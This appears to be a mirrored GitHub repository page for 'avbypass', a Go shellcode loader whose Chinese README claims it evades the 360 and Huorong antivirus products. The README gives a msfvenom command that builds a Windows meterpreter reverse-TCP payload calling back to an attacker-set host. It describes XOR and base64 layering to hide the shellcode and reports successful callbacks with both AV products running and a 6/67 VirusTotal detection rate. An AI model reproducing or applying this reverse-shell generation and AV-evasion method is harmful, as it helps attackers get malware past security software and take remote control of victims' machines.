https://github.com/Shu1L/avbypass

简单go加载器实现免杀360 火绒
https://github.com/Shu1L/avbypass

Last synced: 21 days ago
JSON representation

简单go加载器实现免杀360 火绒

• Host: GitHub
• URL: https://github.com/Shu1L/avbypass
• Owner: Shu1L
• Created: 2021-10-10T11:51:18.000Z (about 3 years ago)
• Default Branch: main
• Last Pushed: 2021-10-11T03:05:04.000Z (about 3 years ago)
• Last Synced: 2024-08-05T17:30:40.613Z (4 months ago)
• Language: Go
• Size: 2.26 MB
• Stars: 36
• Watchers: 2
• Forks: 11
• Open Issues: 0
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

• awesome-hacking-lists - Shu1L/avbypass - 简单go加载器实现免杀360 火绒 (Go)

README

        
## avbypass

#### 使用

```

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=xxx -f raw -o payload.bin

```

使用程序生成加密的shellcode后，填入指定位置，编译执行即可。

通过xor和base64多层加密shellcode实现的go加载器bypassav，

![](https://github.com/Shu1L/avbypass/blob/main/20211010131838.png)

![](https://github.com/Shu1L/avbypass/blob/main/20211010131902.png)

实测在开启360和火绒的情况下msf正常上线

![](https://github.com/Shu1L/avbypass/blob/main/20211010131740.png)

virustotal结果 6/67，后续有时间会慢慢修改

![](https://github.com/Shu1L/avbypass/blob/main/20211010155756.png)# avbypass

# avbypass

"# avbypass"